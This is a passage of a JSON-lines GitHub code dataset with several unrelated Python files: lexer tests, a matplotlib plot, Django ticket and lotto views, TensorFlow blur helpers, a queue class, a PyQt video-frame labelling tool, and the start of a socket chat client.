test_unknown_character_with_identifier(self):\n        with self.assertRaisesRegex(LexerError, \"Unknown token\"):\n            list(self.lexer.tokenize('foo-bar'))\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"jmespath/jmespath.py","sub_path":"tests/test_lexer.py","file_name":"test_lexer.py","file_ext":"py","file_size_in_byte":5880,"program_lang":"python","lang":"en","doc_type":"code","stars":1970,"dataset":"github-code","pt":"53"}
+{"seq_id":"40531581658","text":"\"\"\"\nThe diag_pol_diff_bhmie.py routine compares the phase function\noutput by the bhmie subroutine against one envelope type in a\npolar diagram.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nenv='rayl' # envelope type\n\ndata1=open('Data/bhmie_diff.dat','r')\nif (env=='rayl'):\n    data2=open('Data/rayl_diff.dat','r')\nelif (env=='hg'):\n    data2=open('Data/hg_diff.dat','r')\nelif (env=='polyn'):\n    data2=open('Data/polyn_diff.dat','r')\ntab1=np.array([s.strip().split() for s in data1],dtype='f')\ntab2=np.array([s.strip().split() for s in data2],dtype='f')\ndata_list=(tab1,tab2)\ncolor=('b','r') # one line color per dataset\n\ndef diag_pol(data_list):\n    fig, ax= plt.subplots(figsize=(6.5,9))\n    for i in range(0,len(data_list)):\n        tab=data_list[i]\n\n        diag_pol=np.zeros((tab.shape[0],2))\n        diag_pol[:,0]=-tab[:,1]*np.cos(tab[:,2])\n        diag_pol[:,1]=tab[:,1]*np.sin(tab[:,2])\n\n        ax.plot(diag_pol[:,0],diag_pol[:,1],color=color[i])\n        ax.plot(diag_pol[:,0],-diag_pol[:,1],linestyle='--',color=color[i])\n\n    ax.set_xlabel(r'$P_{esc}cos(\\\theta)$')\n    ax.set_ylabel(r'$P_{esc}sin(\\\theta)$')\n    ax.set_ylim([-1,1])\n    ax.set_xlim([-1,1])\n    ax.grid()\n    \n    plt.legend()\n    plt.show()\ndiag_pol(data_list)\n","repo_name":"PaulBarrere/diffusion-project","sub_path":"Python/diag_pol_diff_bhmie.py","file_name":"diag_pol_diff_bhmie.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"22926623801","text":"from django.shortcuts import render, redirect, reverse\nfrom .models import Ticket, TicketProgress\nfrom cart.models import Order\nfrom .forms import TicketForm\nfrom app1.models import Answer\nfrom app1.forms import AnswerForm\nfrom accounts.models import UserProfile\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import User\nfrom django.contrib import auth, messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.core.paginator import Paginator\n\n# sends the user profile model to the feature list page\n# assigns the ticket objects to an instance of ticket to be able to use the pagination\n# uses the Ticket Form to add a Ticket\n@login_required\ndef 
ticketlist(request):\n order = Order.objects.filter(user=request.user).first()\n profile = UserProfile.objects.all()\n ticket_obj = Ticket.objects.order_by('-date_posted')\n paginator = Paginator(ticket_obj, 3)\n page = request.GET.get('page')\n ticket = paginator.get_page(page)\n form = TicketForm(request.POST)\n if form.is_valid():\n instance = form.save(commit=False)\n instance.author = request.user\n instance.save()\n form = TicketForm()\n return render(request, 'feature/ticketlist.html', {'ticket':ticket, 'form':form, 'profile':profile, 'order':order})\n# displays feature details informations and if the ticket has been answered\n# sends the profile model information to ticket detail page\n@login_required\ndef ticketdetail(request, ticket_id):\n answer = 'There is no answer yet'\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n profile = get_object_or_404(UserProfile, user=ticket.author)\n except ObjectDoesNotExist:\n pass\n try:\n ticketprogress = TicketProgress.objects.get(ticket_prog=ticket_id)\n if ticketprogress.progress == 100:\n ticket.done = True\n ticket.save()\n else:\n ticket.done = False\n\n except ObjectDoesNotExist:\n ticketprogress = 0\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n answer = Answer.objects.get(name=ticket.name)\n except ObjectDoesNotExist:\n pass\n return render(request, 'feature/ticketdetail.html', dict(ticket=ticket, ticketprogress=ticketprogress, answer=answer, profile=profile))\n\n\n@login_required\ndef ticketdelete(request, ticket_id):\n form = Ticket.objects.filter(pk=ticket_id)\n if request.method == 'POST':\n form.delete()\n return redirect(reverse('feature:ticketlist'))\n\n# updates the ticket\n@login_required\ndef ticketupdate(request, ticket_id):\n\n ticket = Ticket.objects.get(pk=ticket_id)\n if request.POST:\n form = TicketForm(request.POST)\n\n if form.is_valid():\n ticket = Ticket.objects.get(pk=ticket_id)\n form = TicketForm(request.POST, instance = ticket)\n form.save()\n return redirect(reverse('feature:ticketlist')) \n else: \n u_form = {\"name\": ticket.name, \"content\":ticket.content} \n form = TicketForm(initial=u_form)\n \n return render(request, 'feature/ticketupdate.html',{'form':form})\n# Validates the voting system \n# Takes voting users and saves as string in \"voted\" comparing with the request.user when voting\n@login_required\ndef ticketresult(request, ticket_id):\n mylist = ''\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n if request.method == 'POST':\n User.objects.filter(username=request.user)\n value = int(request.POST['value']) \n ticket.votes += value\n\n if request.user.username in ticket.voted:\n messages.warning(request, \"You already voted for this post!\")\n return redirect(reverse('feature:ticketlist'))\n\n elif not request.user.username in ticket.voted: \n mylist = ' ' + str(request.user.username) + ' ' \n savedVoted = ticket.voted\n ticket.voted = mylist + savedVoted\n ticket.save()\n return redirect(reverse('feature:ticketdetail', args=(ticket.id,)))\n# uses the Answer form to post an answer to post \ndef ticketanswer(request, ticket_id):\n answer = []\n form = AnswerForm(request.POST)\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n try:\n answer = Answer.objects.get(name=ticket.name)\n except ObjectDoesNotExist:\n form = AnswerForm(request.POST)\n if request.method == 'POST':\n answer = Answer.objects.create(name=ticket.name, content=request.POST['content'])\n return redirect(reverse('feature:ticketlist'))\n return render(request, 'feature/ticketanswer.html', {'form':form, 
'answer':answer, 'ticket':ticket})\n#if a ticket is done redirects to a page with ticket notes\ndef ticketdone(request, ticket_id):\n ticket = get_object_or_404(Ticket, pk=ticket_id)\n \n return render(request, 'feature/ticketdone.html', {'ticket': ticket})","repo_name":"flo0909/djangoprj1","sub_path":"feature/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34045666172","text":"import tensorflow as tf\nimport numpy as np\nfrom scipy.ndimage.filters import gaussian_filter\nfrom ops import concat\n\n\ndef gauss_kernel_fixed(sigma, N):\n # Non-Adaptive kernel size\n if sigma == 0:\n return np.eye(2 * N + 1)[N]\n x = np.arange(-N, N + 1, 1.0)\n g = np.exp(-x * x / (2 * sigma * sigma))\n g = g / np.sum(np.abs(g))\n return g\n\n\ndef gaussian_blur(image, kernel, kernel_size, cdim=3):\n # kernel as placeholder variable, so it can change\n outputs = []\n pad_w = (kernel_size - 1) // 2\n padded = tf.pad(image, [[0, 0], [pad_w, pad_w], [pad_w, pad_w], [0, 0]], mode='REFLECT')\n for channel_idx in range(cdim):\n data_c = padded[:, :, :, channel_idx:(channel_idx + 1)]\n g = tf.reshape(kernel, [1, kernel_size, 1, 1])\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n g = tf.reshape(kernel, [kernel_size, 1, 1, 1])\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n outputs.append(data_c)\n return concat(outputs, axis=3)\n\n\ndef gauss_kernel(sigma, eps, truncate):\n # Adaptive kernel size based on sigma,\n # for fixed kernel size, hardcode N\n # truncate limits kernel size as in scipy's gaussian_filter\n\n N = np.clip(np.ceil(sigma * np.sqrt(2 * np.log(1 / eps))), 1, truncate)\n x = np.arange(-N, N + 1, 1.0)\n g = np.exp(-x * x / (2 * sigma * sigma))\n g = g / np.sum(np.abs(g))\n return g\n\n\ndef gaussian_blur_adaptive(image, sigma, eps=0.01, img_width=32, cdim=3):\n if sigma == 0:\n return image\n outputs = []\n kernel = gauss_kernel(sigma, eps, img_width - 1)\n pad_w = (kernel.shape[0] - 1) // 2\n padded = tf.pad(image, [[0, 0], [pad_w, pad_w], [pad_w, pad_w], [0, 0]], mode='REFLECT')\n for channel_idx in range(cdim):\n data_c = padded[:, :, :, channel_idx:(channel_idx + 1)]\n g = np.expand_dims(kernel, 0)\n g = np.expand_dims(g, axis=2)\n g = np.expand_dims(g, axis=3)\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n g = np.expand_dims(kernel, 1)\n g = np.expand_dims(g, axis=2)\n g = np.expand_dims(g, axis=3)\n data_c = tf.nn.conv2d(data_c, g, [1, 1, 1, 1], 'VALID')\n outputs.append(data_c)\n return concat(outputs, axis=3)\n\n\n# --- old functions, not used any more --\n\ndef _gkern(sigma, truncate=2, dim=1):\n \"\"\"Returns a 1D or 2D Gaussian kernel array.\"\"\"\n size = truncate * 2 + 1\n if dim == 1:\n delta = np.eye(size)[truncate]\n if dim == 2:\n # create nxn zeros\n delta = np.zeros((size, size))\n # set element at the middle to one, a kronecker delta\n delta[truncate, truncate] = 1\n # gaussian-smooth the dirac, resulting in a gaussian filter mask\n return gaussian_filter(delta, sigma, truncate=truncate, mode='constant').astype('float32')\n\n\ndef _gauss_blur_tensor(img_batch, kernel, img_batch_dim, k_size):\n blur_gauss_kernel = tf.stack([kernel, kernel, kernel])\n blur_gauss_kernel_4d = tf.reshape(blur_gauss_kernel, (k_size, k_size, img_batch_dim[3], 1))\n output = tf.nn.depthwise_conv2d(img_batch,\n blur_gauss_kernel_4d,\n strides=[1, 1, 1, 1],\n padding='SAME')\n output = tf.reshape(output, [img_batch_dim[0], 
img_batch_dim[1], img_batch_dim[2], img_batch_dim[3]])\n # print('blur %f' % kernel[1, 1])\n return output\n\n\ndef _gauss_blur(img_batch, sigma, truncate=2):\n return np.array([gaussian_filter(image, (sigma, sigma, 0), truncate=truncate, mode='constant').astype('float32')\n for image in img_batch])\n","repo_name":"alex-sage/logo-gen","sub_path":"dcgan/gauss.py","file_name":"gauss.py","file_ext":"py","file_size_in_byte":3633,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"53"} +{"seq_id":"31263625232","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Queue:\n def __init__(self):\n self.front = None\n self.rear = None\n self.count = 0\n\n def enqueue(self, value):\n if self.rear is None:\n self.front = self.rear = value\n self.count += 1\n else:\n self.rear.next = value\n self.rear = value\n self.count += 1\n\n def dequeue(self):\n if Queue.isEmpty(self):\n print(\"Queue is empty, Nothing to dequeue!!\")\n else:\n if self.front is None:\n self.front = None\n else:\n self.front = self.front.next\n self.count -= 1\n\n def isEmpty(self):\n if self.rear is None:\n return True\n else:\n return False\n\n def size(self):\n if self.count <= 0:\n print(\"queue is empty!!\")\n return self.count\n\n def traverse(self):\n if self.count == 0:\n print(\"Queue is empty!!\")\n else:\n curNode = self.front\n while curNode is not None:\n print(curNode.data)\n curNode = curNode.next\n","repo_name":"ravindraindia4u/Python","sub_path":"Data_Structure_Programs/queue.py","file_name":"queue.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37521581992","text":"import os, sys, time, typing\nfrom datetime import datetime\nfrom PIL import ImageFont, ImageDraw, Image\nfrom PyQt5.QtWidgets import (QApplication, QWidget, QPushButton,\n QHBoxLayout, QVBoxLayout, QLabel, QFileDialog, QLineEdit,\n QScrollArea, QComboBox, QTextEdit)\nfrom PyQt5 import QtGui\nfrom PyQt5.QtGui import QPixmap, QIntValidator\nfrom PyQt5.QtCore import Qt, QThread, pyqtSignal\n\n\nclass ThreadWorker(QThread):\n sig = pyqtSignal()\n\n def __init__(self, filepath) -> None:\n super().__init__()\n self.filepath = filepath\n self.root = \"/home/milk/视频/material-epg/zdk\"\n\n def run(self):\n filename = self.filepath.split(\"/\")[-1].split(\".\")[0]\n dirpath = f\"{self.root}/videos/\"\n command = f'mkdir {dirpath}{filename};ffmpeg -y -i {dirpath}{filename}.mp4 -f image2 -r 25 -q:v 2 {dirpath}{filename}/%d.jpg;ffmpeg -y -i {dirpath}{filename}.mp4 -vf \"fps=1/5,scale=iw/4:-1,tile=8x90\" {dirpath}{filename}.jpg'\n os.system(command)\n # self.framing(f\"{dirpath}{filename}.jpg\")\n self.sig.emit()\n\n def framing(self, fileName):\n image = Image.open(fileName)\n width, height = image.size\n perw = width / 8\n perh = height / 90\n font = ImageFont.truetype(\"Pillow/Tests/fonts/FreeMono.ttf\", 50)\n draw = ImageDraw.Draw(image)\n for i in range(8):\n for j in range(90):\n draw.text((i*perw, j*perh), str((i*5+j*5*8)*25+63), font=font, fill=\"#a20808\")\n image.save(\"%s/2-%s\"%(fileName.rsplit(\"/\", 1)[0], fileName.rsplit(\"/\", 1)[1]))\n\n\nclass MainScroll(QScrollArea):\n sig = pyqtSignal(float)\n\n def __init__(self, parent: typing.Optional[QWidget] = ...) 
-> None:\n super().__init__(parent)\n\n def mousePressEvent(self, a0: QtGui.QMouseEvent) -> None:\n if a0.buttons() == Qt.MouseButton.LeftButton:\n height, width = self.children()[0].children()[0].height(), self.children()[0].children()[0].width()\n per_x, per_y = width / 8, height / 90\n if width > 100:\n cx, cy = a0.localPos().x(), self.verticalScrollBar().value() + a0.localPos().y()\n px, py = cx // per_x, cy // per_y\n pidx = (px * 5 + py * 5 * 8) *25 + 63\n self.sig.emit(pidx)\n return super().mousePressEvent(a0)\n\n\nclass ClickLabel(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass ClickLabel2(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass ClickLabel3(QLabel):\n sig = pyqtSignal(str)\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def mousePressEvent(self, ev: QtGui.QMouseEvent) -> None:\n if ev.buttons() == Qt.MouseButton.LeftButton:\n self.sig.emit(self.filename)\n return super().mousePressEvent(ev)\n\n def setPixmap(self, a0: QtGui.QPixmap, filename: str) -> None:\n self.filename = filename\n return super().setPixmap(a0)\n\n\nclass DataLabel(QLabel):\n\n def __init__(self, dot, name, parent=None):\n self.dot = dot\n self.name = name\n super().__init__(parent)\n\n\nclass EnterLineEdit(QLineEdit):\n jump = pyqtSignal()\n\n def __init__(self, parent=None):\n super().__init__(parent)\n\n def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:\n if a0.key() == Qt.Key.Key_Return:\n self.jump.emit()\n return super().keyPressEvent(a0)\n\n\nclass Window(QWidget):\n\n def __init__(self):\n super().__init__()\n self.root = \"/home/milk/视频/material-epg/zdk\"\n self.piclist = []\n self.picdir = \"\"\n self.file = \"\"\n self.datalist = []\n self.nameList = []\n self.initUI()\n\n def initUI(self):\n self.setWindowTitle(\"demo\")\n self.resize(2200, 1000)\n\n self.button1 = QPushButton(\"视频分帧\", self)\n self.button1.setGeometry(20, 10, 90, 30)\n self.button1.clicked.connect(self.openFile)\n self.button2 = QPushButton(\"选择图片文件夹\", self)\n self.button2.setGeometry(20, 50, 120, 30)\n self.button2.clicked.connect(self.openDir)\n self.button3 = QPushButton(\"跳转\", self)\n self.button3.setGeometry(300, 50, 50, 30)\n self.button3.clicked.connect(self.jumpPage)\n\n self.label1 = QLabel(self)\n self.label1.move(120, 15)\n self.label2 = QLabel(self)\n self.label2.move(600, 15)\n self.plabel = QLabel(self)\n self.plabel.move(1460, 90)\n self.plabel2 = QLabel(self)\n\n self.flabel1 = ClickLabel(self)\n self.flabel1.move(10, 780)\n self.flabel1.sig.connect(self.setPicH)\n self.flabel2 = ClickLabel(self)\n self.flabel2.move(10+370, 780)\n self.flabel2.sig.connect(self.setPicH)\n self.flabel3 = ClickLabel(self)\n self.flabel3.move(10+370*2, 780)\n self.flabel3.sig.connect(self.setPicH)\n self.flabel4 = ClickLabel(self)\n self.flabel4.move(10+370*3, 780)\n 
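# these three thumbnail rows refine the seek step by step: the f-row jumps\n        # in 25-frame steps, the h-row in 5-frame steps, and the g-row frame by frame\n        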
self.flabel4.sig.connect(self.setPicH)\n self.flabel5 = ClickLabel(self)\n self.flabel5.move(10+370*4, 780)\n self.flabel5.sig.connect(self.setPicH)\n\n self.hlabel1 = ClickLabel2(self)\n self.hlabel1.move(10, 780+210)\n self.hlabel1.sig.connect(self.setPicG)\n self.hlabel2 = ClickLabel2(self)\n self.hlabel2.move(10+370, 780+210)\n self.hlabel2.sig.connect(self.setPicG)\n self.hlabel3 = ClickLabel2(self)\n self.hlabel3.move(10+370*2, 780+210)\n self.hlabel3.sig.connect(self.setPicG)\n self.hlabel4 = ClickLabel2(self)\n self.hlabel4.move(10+370*3, 780+210)\n self.hlabel4.sig.connect(self.setPicG)\n self.hlabel5 = ClickLabel2(self)\n self.hlabel5.move(10+370*4, 780+210)\n self.hlabel5.sig.connect(self.setPicG)\n\n self.glabel1 = ClickLabel3(self)\n self.glabel1.move(10, 780+210*2)\n self.glabel1.sig.connect(self.setPicR)\n self.glabel2 = ClickLabel3(self)\n self.glabel2.move(10+370, 780+210*2)\n self.glabel2.sig.connect(self.setPicR)\n self.glabel3 = ClickLabel3(self)\n self.glabel3.move(10+370*2, 780+210*2)\n self.glabel3.sig.connect(self.setPicR)\n self.glabel4 = ClickLabel3(self)\n self.glabel4.move(10+370*3, 780+210*2)\n self.glabel4.sig.connect(self.setPicR)\n self.glabel5 = ClickLabel3(self)\n self.glabel5.move(10+370*4, 780+210*2)\n self.glabel5.sig.connect(self.setPicR)\n\n self.textbox = EnterLineEdit(self)\n self.textbox.setGeometry(160, 50, 120, 30)\n self.textbox.setValidator(QIntValidator())\n self.textbox.jump.connect(self.jumpPage)\n\n self.mscroll = MainScroll(self)\n self.mscroll.setWidget(self.plabel2)\n self.mscroll.setGeometry(10, 90, 1440, 680)\n self.mscroll.setHorizontalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n # scroll.setVerticalScrollBarPolicy(Qt.ScrollBarPolicy.ScrollBarAlwaysOff)\n self.mscroll.sig.connect(self.setPicF)\n\n win1 = QWidget(self)\n vbox = QVBoxLayout(win1)\n hbox = QHBoxLayout()\n self.vbox2 = QVBoxLayout()\n self.textwin = QTextEdit()\n self.textwin.setReadOnly(True)\n self.vbox2.addWidget(self.textwin)\n # self.vbox2.addStretch(1)\n self.slabel = QLabel(\"\")\n self.tbutton = QPushButton(\"确定\")\n self.tbutton.clicked.connect(self.addEle)\n self.combo = QComboBox()\n self.combo.addItems(self.nameList)\n self.combo.setEditable(True)\n self.combo.setCurrentText(\"\")\n hbox.addWidget(self.slabel)\n hbox.addWidget(self.combo)\n # hbox.addStretch(1)\n hbox.addWidget(self.tbutton)\n # hbox.setStretch(0, 2)\n hbox.setStretch(1, 16)\n hbox.setStretch(2, 4)\n # hbox.addStretch(2)\n vbox.addLayout(hbox)\n vbox.addLayout(self.vbox2)\n vbox.addStretch(1)\n vbox.setStretch(0, 1)\n vbox.setStretch(1, 9)\n # vbox.addWidget(self.slabel, 1, Qt.AlignmentFlag.AlignLeft | Qt.AlignmentFlag.AlignTop)\n # vbox.addWidget(combo)\n # vbox.addWidget(button, 1, Qt.AlignmentFlag.AlignRight | Qt.AlignmentFlag.AlignBottom)\n win1.setGeometry(10+370*5, 780, 400, 600)\n # win1.setStyleSheet(\"border: 1px solid black;\")\n\n self.show()\n\n def keyPressEvent(self, a0: QtGui.QKeyEvent) -> None:\n if not self.file:\n return super().keyPressEvent(a0)\n if a0.key() == Qt.Key.Key_D:\n index = self.piclist.index(self.file)\n self.file = self.piclist[index+1]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.setWindowTitle(self.file)\n if a0.key() == Qt.Key.Key_S:\n index = self.piclist.index(self.file)\n self.file = self.piclist[index-1]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.setWindowTitle(self.file)\n if a0.key() == 
Qt.Key.Key_C:\n clipboard = QApplication.clipboard()\n clipboard.setText(self.file.split(\".\")[0])\n return super().keyPressEvent(a0)\n\n def jumpPage(self):\n self.textbox.clearFocus()\n filename = self.textbox.text()\n # self.textbox.clear()\n if not filename:\n filename = \"1\"\n self.file = f\"{filename}.jpg\"\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n self.setWindowTitle(self.file)\n\n def addEle(self):\n self.datalist.append((self.file.split(\".\")[0], self.combo.currentText()))\n if self.combo.currentText() not in self.nameList:\n self.nameList.append(self.combo.currentText())\n self.combo.addItem(self.combo.currentText())\n self.textwin.setText(\"\\n\".join([\"%s %s\"%ele for ele in self.datalist]))\n\n\n def openFile(self):\n filepath, _ = QFileDialog.getOpenFileName(self, \"选取视频文件\", self.root, \"*.mp4\")\n if not filepath:\n return\n self.label1.setText(filepath)\n self.label1.adjustSize()\n self.thread = ThreadWorker(filepath)\n self.thread.sig.connect(self.handleFinish)\n self.thread.start()\n\n def handleFinish(self):\n self.label2.setText(\"完成\")\n self.label2.adjustSize()\n\n def setPicF(self, pidx):\n self.file = f\"{int(pidx)}.jpg\"\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n fpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-100]))\n self.flabel1.setPixmap(fpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-100])\n self.flabel1.adjustSize()\n fpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-75]))\n self.flabel2.setPixmap(fpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-75])\n self.flabel2.adjustSize()\n fpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-50]))\n self.flabel3.setPixmap(fpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-50])\n self.flabel3.adjustSize()\n fpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-25]))\n self.flabel4.setPixmap(fpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-25])\n self.flabel4.adjustSize()\n fpixmap5 = QPixmap(os.path.join(self.picdir, self.file))\n self.flabel5.setPixmap(fpixmap5.scaledToHeight(200), self.file)\n self.flabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicH(self, filename):\n self.file = filename\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n \n hpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-20]))\n self.hlabel1.setPixmap(hpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-20])\n self.hlabel1.adjustSize()\n hpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-15]))\n self.hlabel2.setPixmap(hpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-15])\n self.hlabel2.adjustSize()\n hpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-10]))\n self.hlabel3.setPixmap(hpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-10])\n self.hlabel3.adjustSize()\n hpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-5]))\n self.hlabel4.setPixmap(hpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-5])\n self.hlabel4.adjustSize()\n hpixmap5 = 
QPixmap(os.path.join(self.picdir, self.file))\n self.hlabel5.setPixmap(hpixmap5.scaledToHeight(200), self.file)\n self.hlabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicG(self, filename):\n self.file = filename\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n \n gpixmap1 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-4]))\n self.glabel1.setPixmap(gpixmap1.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-4])\n self.glabel1.adjustSize()\n gpixmap2 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-3]))\n self.glabel2.setPixmap(gpixmap2.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-3])\n self.glabel2.adjustSize()\n gpixmap3 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-2]))\n self.glabel3.setPixmap(gpixmap3.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-2])\n self.glabel3.adjustSize()\n gpixmap4 = QPixmap(os.path.join(self.picdir, self.piclist[self.piclist.index(self.file)-1]))\n self.glabel4.setPixmap(gpixmap4.scaledToHeight(200), self.piclist[self.piclist.index(self.file)-1])\n self.glabel4.adjustSize()\n gpixmap5 = QPixmap(os.path.join(self.picdir, self.file))\n self.glabel5.setPixmap(gpixmap5.scaledToHeight(200), self.file)\n self.glabel5.adjustSize()\n\n self.setWindowTitle(self.file)\n\n def setPicR(self, filename):\n self.file = filename\n framenum = filename.split(\".\")[0]\n dot = datetime.strptime(\"2022-10-15 02:59:35\", \"%Y-%m-%d %H:%M:%S\").timestamp() + round(int(framenum)/25, 2)\n dtime = datetime.fromtimestamp(dot).strftime(\"%Y-%m-%d %H:%M:%S.%f\")[:-4]\n self.slabel.setText(dtime)\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n\n self.setWindowTitle(self.file)\n\n def openDir(self):\n self.picdir = QFileDialog.getExistingDirectory(self, \"选取图片文件夹\", self.root)\n if not self.picdir:\n return\n self.piclist = os.listdir(self.picdir)\n self.piclist.sort(key=lambda x: int(x.split(\".\")[0]))\n self.file = self.piclist[0]\n pixmap = QPixmap(os.path.join(self.picdir, self.file))\n self.plabel.setPixmap(pixmap.scaledToWidth(720))\n self.plabel.adjustSize()\n\n pixmap2 = QPixmap(\"%s/%s.jpg\"%(self.picdir.rsplit(\"/\", 1)[0], self.picdir.rsplit(\"/\", 1)[1]))\n self.plabel2.setPixmap(pixmap2.scaledToWidth(1440))\n self.plabel2.adjustSize()\n\n self.mscroll.verticalScrollBar().setValue(0)\n self.setWindowTitle(self.file)\n\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n ex = Window()\n sys.exit(app.exec_())\n","repo_name":"PapayaMilk/EpgLabelTool","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70020283048","text":"from django.shortcuts import render\nimport random\n\n# Create your views here.\ndef index(request): \n return render(request, \"index.html\")\n\n\ndef today_dinner(request):\n dinner_list = [\n {\"name\": \"salad\", \"src\": \"https://www.licious.in/blog/wp-content/uploads/2020/12/3-Step-Chicken-Salad.jpg\"},\n {\"name\": \"steak\", \"src\": \"https://natashaskitchen.com/wp-content/uploads/2020/03/Pan-Seared-Steak-4.jpg\"},\n {\"name\": \"pasta\", \"src\": \"https://hips.hearstapps.com/hmg-prod.s3.amazonaws.com/images/delish-bucatinipasta-045-ls-1607552701.jpg\"},\n ]\n \n dinner = random.choice(dinner_list)\n context = {\n 
\"dinner\" : dinner\n }\n \n return render(request, \"today_dinner.html\", context)\n\n\ndef lotto(request):\n # 1부터 46사이의 숫자를 6개 뽑는다\n # 로또 번호 6개를 5번 뽑기\n lotto_list = []\n\n '''\n lotto_result_list = [\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n {\"lotto\":[1,2,3,4,5,6], \"result\":\"1등 - 10억\"},\n ]\n ''' \n\n for _ in range(5):\n lotto = random.sample(range(1, 46),6)\n lotto_list.append(lotto)\n \n context = {\n \"lotto_list\": lotto_list,\n }\n return render(request, \"lotto.html\", context)\n\n\n","repo_name":"astroastrum/Django","sub_path":"tb_1010/random_game/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"23147685417","text":"import socket\r\nimport threading\r\nimport json\r\nfrom cmd import Cmd\r\n\r\nclass Client(Cmd):\r\n prompt = ''\r\n intro = 'Welcome to my chatroom\\n' + '\\help you for use program \\n'\r\n\r\n def __init__(self):\r\n \r\n super().__init__()\r\n self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n self.__id = None\r\n self.__nickname = None\r\n\r\n def __receive_message_thread(self):\r\n \"\"\"\r\n Accept message thread\r\n \"\"\"\r\n while True:\r\n # noinspection PyBroadException\r\n try:\r\n buffer = 